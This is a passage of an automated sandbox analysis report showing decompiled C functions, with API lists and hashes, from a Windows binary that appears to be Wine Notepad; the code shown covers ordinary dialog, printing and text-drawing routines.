                                                  						_t6 = E010A1770();
                                                  						if(_t6 != 0) {
                                                  							goto L9;
                                                  						}
                                                  						goto L10;
                                                  					} else {
                                                  						if(_t9 == 1) {
                                                  							goto L9;
                                                  						}
                                                  						return _t6;
                                                  					}
                                                  				}
                                                  			}








                                                  APIs
                                                  • GetWindowTextLengthW.USER32(0001FF42), ref: 010A1427
                                                  • SendMessageW.USER32(000000B8,00000000,00000000), ref: 010A143E
                                                  • SetWindowTextW.USER32(010BEDAC), ref: 010A147F
                                                  • SendMessageW.USER32(000000CD,00000000,00000000), ref: 010A1494
                                                  • SetFocus.USER32(?,?,?,?,?,?,?), ref: 010A14A0
                                                    • Part of subcall function 010A1770: _memset.LIBCMT ref: 010A1781
                                                    • Part of subcall function 010A1770: lstrcpyW.KERNEL32 ref: 010A1795
                                                    • Part of subcall function 010A1770: GetSaveFileNameW.COMDLG32(?), ref: 010A17FD
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303816197.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000002.00000002.303807726.00000000010A0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303840310.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303853762.00000000010C1000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303864783.00000000010C6000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: MessageSendTextWindow$FileFocusLengthNameSave_memsetlstrcpy
                                                  • String ID:
                                                  • API String ID: 4018755269-0
                                                  • Opcode ID: ac784a792a3f1d9ed2c5502fb43ba3a710919bf6a91be5aa9e49e5d2a2e3390e
                                                  • Instruction ID: d0d01fd0f563563de540cd7f9346493ed34abdffebda81ad61e8cb312e8b1206
                                                  • Opcode Fuzzy Hash: ac784a792a3f1d9ed2c5502fb43ba3a710919bf6a91be5aa9e49e5d2a2e3390e
                                                  • Instruction Fuzzy Hash: 58F01D365402129BFEB22BFCBD49BE53E71BB05690F958151FAC4A90A9CF7B8901CB40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E010A2AA8(void* __ebp, struct HACCEL__* _a16, struct tagMSG _a20, intOrPtr _a28) {
                                                  
                                                  				do {
                                                  					if(IsDialogMessageW( *0x10c3f28,  &_a20) == 0 && TranslateAcceleratorW( *0x10c3f24, _a16,  &_a20) == 0) {
                                                  						TranslateMessage( &_a20);
                                                  						DispatchMessageW( &_a20);
                                                  					}
                                                  				} while (GetMessageW( &_a20, 0, 0, 0) != 0);
                                                  				return _a28;
                                                  			}




                                                  APIs
                                                  • IsDialogMessageW.USER32(?), ref: 010A2ABB
                                                  • TranslateAcceleratorW.USER32(?,?), ref: 010A2AD4
                                                  • TranslateMessage.USER32(?), ref: 010A2AE3
                                                  • DispatchMessageW.USER32 ref: 010A2AEA
                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 010A2AF7
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303816197.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000002.00000002.303807726.00000000010A0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303840310.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303853762.00000000010C1000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303864783.00000000010C6000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: Message$Translate$AcceleratorDialogDispatch
                                                  • String ID:
                                                  • API String ID: 3609149896-0
                                                  • Opcode ID: 133e86bec54473f1f56f6e4fd3e362fa2c5c49a2ea4619a0f178a58fcfc51ecf
                                                  • Instruction ID: 60769d02cf6f83864cc79469fbbcbb48fa8f249cc1afdab2abde353d41d93b44
                                                  • Opcode Fuzzy Hash: 133e86bec54473f1f56f6e4fd3e362fa2c5c49a2ea4619a0f178a58fcfc51ecf
                                                  • Instruction Fuzzy Hash: B7F0307220430AAFD720DF94ED84F9BB7ECFB88600F400829F6C4D2050E776D8199B62
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E010A2000() {
                                                  				intOrPtr _v38;
                                                  				short _v40;
                                                  				intOrPtr _v52;
                                                  				intOrPtr _v60;
                                                  				intOrPtr _v64;
                                                  				intOrPtr _v68;
                                                  				struct tagPD _v72;
                                                  				intOrPtr _t22;
                                                  
                                                  				E010A66E0( &_v72, 0, 0x42);
                                                  				_v68 =  *0x10c3f24;
                                                  				_v64 =  *0x10c510c;
                                                  				_v60 =  *0x10c5110;
                                                  				_v38 =  *0x10c3f20;
                                                  				_v40 = 1;
                                                  				_v72 = 0x42;
                                                  				_v52 = 0x40;
                                                  				PrintDlgW( &_v72);
                                                  				 *0x10c510c = _v64;
                                                  				_t22 = _v60;
                                                  				 *0x10c5110 = _t22;
                                                  				return _t22;
                                                  			}












                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303816197.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000002.00000002.303807726.00000000010A0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303840310.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303853762.00000000010C1000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303864783.00000000010C6000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: Print_memset
                                                  • String ID: @$B
                                                  • API String ID: 2425697088-3873543624
                                                  • Opcode ID: 0ed7951ad7dda9d1732d58cfcbcc2dfb1c7fc1c91c595e3ae27022c4a0439e86
                                                  • Instruction ID: ff1438fdd0d050c47bbb1b1408779daa2084e229ac3f0463d6330bf6720396ef
                                                  • Opcode Fuzzy Hash: 0ed7951ad7dda9d1732d58cfcbcc2dfb1c7fc1c91c595e3ae27022c4a0439e86
                                                  • Instruction Fuzzy Hash: BF01C9B8E102089FCB50CF98E985B8DB7F4FB4C300F404126E988E7344E77AA9058F55
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E010A2580() {
                                                  				short _v516;
                                                  				void* _t3;
                                                  
                                                  				_t3 = LoadImageW( *0x10c3f20, 0x300, 1, 0x30, 0x30, 0x8000);
                                                  				LoadStringW( *0x10c3f20, 0x170,  &_v516, 0);
                                                  				return ShellAboutW( *0x10c3f24,  &_v516, L"Wine Notepad", _t3);
                                                  			}






                                                  APIs
                                                  • LoadImageW.USER32 ref: 010A25A0
                                                  • LoadStringW.USER32(00000170,?,00000000), ref: 010A25BC
                                                  • ShellAboutW.SHELL32(?,Wine Notepad,00000000), ref: 010A25D5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303816197.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000002.00000002.303807726.00000000010A0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303840310.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303853762.00000000010C1000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303864783.00000000010C6000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: Load$AboutImageShellString
                                                  • String ID: Wine Notepad
                                                  • API String ID: 2733739231-3086428749
                                                  • Opcode ID: e4b8ca5949e573987b6359b549a4c3ca6e1ffbc23e853ffee0d2c3fb6074d46d
                                                  • Instruction ID: b212f807f021e25f2be132c610dfb7e1d325a0875a9e818b18c112560ed9d484
                                                  • Opcode Fuzzy Hash: e4b8ca5949e573987b6359b549a4c3ca6e1ffbc23e853ffee0d2c3fb6074d46d
                                                  • Instruction Fuzzy Hash: 97F03033151215BBF7315790ED8AFEA7A7CF708B10F000051B698690D4D6A729148B94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 88%
                                                  			E010A1540(intOrPtr __ecx) {
                                                  				intOrPtr _v32;
                                                  				intOrPtr _v40;
                                                  				intOrPtr _v60;
                                                  				signed int _v64;
                                                  				intOrPtr _v88;
                                                  				struct tagOFNA _v92;
                                                  				signed int _t12;
                                                  				intOrPtr _t16;
                                                  
                                                  				_t16 = __ecx;
                                                  				E010A66E0( &_v92, 0, 0x58);
                                                  				_v92 = 0x58;
                                                  				_v40 = 0x806;
                                                  				_v88 = _t16;
                                                  				_v64 = L"output.prn";
                                                  				_v60 = 0x104;
                                                  				_v32 = L"prn";
                                                  				_t12 = GetSaveFileNameW( &_v92);
                                                  				asm("sbb eax, eax");
                                                  				return  ~_t12 & L"output.prn";
                                                  			}












                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303816197.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000002.00000002.303807726.00000000010A0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303840310.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303853762.00000000010C1000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303864783.00000000010C6000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: FileNameSave_memset
                                                  • String ID: X$prn
                                                  • API String ID: 1534219092-48460805
                                                  • Opcode ID: 0236a61d3e32a07435c3da76f6247a19fc48f4f561c5032feb24b510c98aa842
                                                  • Instruction ID: e2599603cedc2607cc0b31915f7e08254877d9d8b234ea696e0a881e293b064c
                                                  • Opcode Fuzzy Hash: 0236a61d3e32a07435c3da76f6247a19fc48f4f561c5032feb24b510c98aa842
                                                  • Instruction Fuzzy Hash: AFF08CB1C4024D9BCB00DFD4DC4A7CEBBB8AB08749F104009E944EA284EBB984588F80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 33%
                                                  			E010A8069(void* __ecx) {
                                                  				signed int _v8;
                                                  				_Unknown_base(*)()* _t5;
                                                  
                                                  				_v8 = _v8 & 0x00000000;
                                                  				_t5 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "GetCurrentPackageId");
                                                  				if(_t5 == 0) {
                                                  					L3:
                                                  					return 0;
                                                  				} else {
                                                  					_push(0);
                                                  					_push( &_v8);
                                                  					if( *_t5() != 0x7a) {
                                                  						goto L3;
                                                  					} else {
                                                  						return 1;
                                                  					}
                                                  				}
                                                  			}






                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,GetCurrentPackageId), ref: 010A807B
                                                  • GetProcAddress.KERNEL32(00000000), ref: 010A8082
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303816197.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000002.00000002.303807726.00000000010A0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303840310.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303853762.00000000010C1000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303864783.00000000010C6000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: AddressHandleModuleProc
                                                  • String ID: GetCurrentPackageId$kernel32.dll
                                                  • API String ID: 1646373207-142416881
                                                  • Opcode ID: 74ef7e9d0bf7c52f03b9e37a69149a223e82a51dc4626ef6255aca5a11d048cc
                                                  • Instruction ID: cc3f773d983011958fed7e35ce9bd8c2ddb3a76e4604934d31fbaee96844d6fa
                                                  • Opcode Fuzzy Hash: 74ef7e9d0bf7c52f03b9e37a69149a223e82a51dc4626ef6255aca5a11d048cc
                                                  • Instruction Fuzzy Hash: 4FE0EC316A030477EB64ABF19E8AB9B769C970164AF504968F282E1081DAF9D6008764
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E010AFAAD(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                  				char _v8;
                                                  				intOrPtr _v12;
                                                  				signed int _v20;
                                                  				signed int _t35;
                                                  				int _t38;
                                                  				int _t42;
                                                  				intOrPtr* _t44;
                                                  				int _t47;
                                                  				short* _t49;
                                                  				intOrPtr _t50;
                                                  				intOrPtr _t54;
                                                  				int _t55;
                                                  				signed int _t59;
                                                  				char* _t62;
                                                  
                                                  				_t62 = _a8;
                                                  				if(_t62 == 0) {
                                                  					L5:
                                                  					return 0;
                                                  				}
                                                  				_t50 = _a12;
                                                  				if(_t50 == 0) {
                                                  					goto L5;
                                                  				}
                                                  				if( *_t62 != 0) {
                                                  					E010A9233( &_v20, _a16);
                                                  					_t35 = _v20;
                                                  					__eflags =  *(_t35 + 0xa8);
                                                  					if( *(_t35 + 0xa8) != 0) {
                                                  						_t38 = E010AF98A( *_t62 & 0x000000ff,  &_v20);
                                                  						__eflags = _t38;
                                                  						if(_t38 == 0) {
                                                  							__eflags = _a4;
                                                  							_t59 = 1;
                                                  							_t28 = _v20 + 4; // 0x840ffff8
                                                  							_t42 = MultiByteToWideChar( *_t28, 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
                                                  							__eflags = _t42;
                                                  							if(_t42 != 0) {
                                                  								L21:
                                                  								__eflags = _v8;
                                                  								if(_v8 != 0) {
                                                  									_t54 = _v12;
                                                  									_t31 = _t54 + 0x70;
                                                  									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
                                                  									__eflags =  *_t31;
                                                  								}
                                                  								return _t59;
                                                  							}
                                                  							L20:
                                                  							_t44 = E010A6117();
                                                  							_t59 = _t59 | 0xffffffff;
                                                  							__eflags = _t59;
                                                  							 *_t44 = 0x2a;
                                                  							goto L21;
                                                  						}
                                                  						_t59 = _v20;
                                                  						__eflags =  *(_t59 + 0x74) - 1;
                                                  						if( *(_t59 + 0x74) <= 1) {
                                                  							L15:
                                                  							_t20 = _t59 + 0x74; // 0x48b1fe1
                                                  							__eflags = _t50 -  *_t20;
                                                  							L16:
                                                  							if(__eflags < 0) {
                                                  								goto L20;
                                                  							}
                                                  							__eflags = _t62[1];
                                                  							if(_t62[1] == 0) {
                                                  								goto L20;
                                                  							}
                                                  							L18:
                                                  							_t22 = _t59 + 0x74; // 0x48b1fe1
                                                  							_t59 =  *_t22;
                                                  							goto L21;
                                                  						}
                                                  						_t12 = _t59 + 0x74; // 0x48b1fe1
                                                  						__eflags = _t50 -  *_t12;
                                                  						if(__eflags < 0) {
                                                  							goto L16;
                                                  						}
                                                  						__eflags = _a4;
                                                  						_t17 = _t59 + 0x74; // 0x48b1fe1
                                                  						_t18 = _t59 + 4; // 0x840ffff8
                                                  						_t47 = MultiByteToWideChar( *_t18, 9, _t62,  *_t17, _a4, 0 | _a4 != 0x00000000);
                                                  						_t59 = _v20;
                                                  						__eflags = _t47;
                                                  						if(_t47 != 0) {
                                                  							goto L18;
                                                  						}
                                                  						goto L15;
                                                  					}
                                                  					_t55 = _a4;
                                                  					__eflags = _t55;
                                                  					if(_t55 != 0) {
                                                  						 *_t55 =  *_t62 & 0x000000ff;
                                                  					}
                                                  					_t59 = 1;
                                                  					goto L21;
                                                  				}
                                                  				_t49 = _a4;
                                                  				if(_t49 != 0) {
                                                  					 *_t49 = 0;
                                                  				}
                                                  				goto L5;
                                                  			}

















                                                  APIs
                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 010AFAE1
                                                  • __isleadbyte_l.LIBCMT ref: 010AFB0F
                                                  • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,048B1FE1,00BFBBEF,00000000,?,00000000,?,?,010B3743,?,00BFBBEF,00000003), ref: 010AFB3D
                                                  • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,00BFBBEF,00000000,?,00000000,?,?,010B3743,?,00BFBBEF,00000003), ref: 010AFB73
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303816197.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000002.00000002.303807726.00000000010A0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303840310.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303853762.00000000010C1000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303864783.00000000010C6000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                  • String ID:
                                                  • API String ID: 3058430110-0
                                                  • Opcode ID: 7ac7f67495ec194942098bc58d9c9eede84a3723049a816becf9cb66fe3169b6
                                                  • Instruction ID: b49655052fe9c2941dbecb5d08ad187e3ec53c803f59393c59de2416dba0f359
                                                  • Opcode Fuzzy Hash: 7ac7f67495ec194942098bc58d9c9eede84a3723049a816becf9cb66fe3169b6
                                                  • Instruction Fuzzy Hash: 2731C131600247EFEB218EB8C894BAE7FF9FF45360F558568E5A59B191D730E850CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 91%
                                                  			E010A1810(struct HDC__* __ecx, RECT* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
                                                  				struct HDC__* _v8;
                                                  				struct tagSIZE _v16;
                                                  				int _t16;
                                                  				WCHAR* _t23;
                                                  				RECT* _t25;
                                                  				RECT* _t26;
                                                  				struct HDC__* _t27;
                                                  				int _t29;
                                                  
                                                  				_t25 = __edx;
                                                  				_t23 = _a12;
                                                  				_t27 = __ecx;
                                                  				_t26 = __edx;
                                                  				_v8 = __ecx;
                                                  				GetTextExtentPoint32W(_t27, _t23, lstrlenW(_t23),  &_v16);
                                                  				if(_a4 != 0) {
                                                  					if(_a8 == 0) {
                                                  						_t29 = _t26->bottom - _v16.cy;
                                                  					} else {
                                                  						_t29 = _t26->top;
                                                  					}
                                                  					_t16 = lstrlenW(_t23);
                                                  					asm("cdq");
                                                  					ExtTextOutW(_v8, _t26->right - _v16.cx + _t26->left - _t25 >> 1, _t29, 4, _t26, _t23, _t16, 0);
                                                  				}
                                                  				return 1;
                                                  			}











                                                  APIs
                                                  • lstrlenW.KERNEL32(?,?), ref: 010A1828
                                                  • GetTextExtentPoint32W.GDI32(?,?,00000000), ref: 010A1831
                                                  • lstrlenW.KERNEL32(?,00000000,?,?,00000000), ref: 010A1851
                                                  • ExtTextOutW.GDI32(?,00000000,00000000,00000004,?,?,00000000), ref: 010A186E
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303816197.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000002.00000002.303807726.00000000010A0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303840310.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303853762.00000000010C1000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303864783.00000000010C6000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: Textlstrlen$ExtentPoint32
                                                  • String ID:
                                                  • API String ID: 2058588642-0
                                                  • Opcode ID: 09a6487e9bdddacc0f03d78b5392d09b9b48bde00e051175bd5cae20706e7a80
                                                  • Instruction ID: 360c2803d978ae15fa74da46ae6a3cabf60c1f617d5ce8d8e611597d8887fc36
                                                  • Opcode Fuzzy Hash: 09a6487e9bdddacc0f03d78b5392d09b9b48bde00e051175bd5cae20706e7a80
                                                  • Instruction Fuzzy Hash: 3B015E72900114BFE7109E9CDD88FEEBBBCEB49310F448155FA58E3144C735A950CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%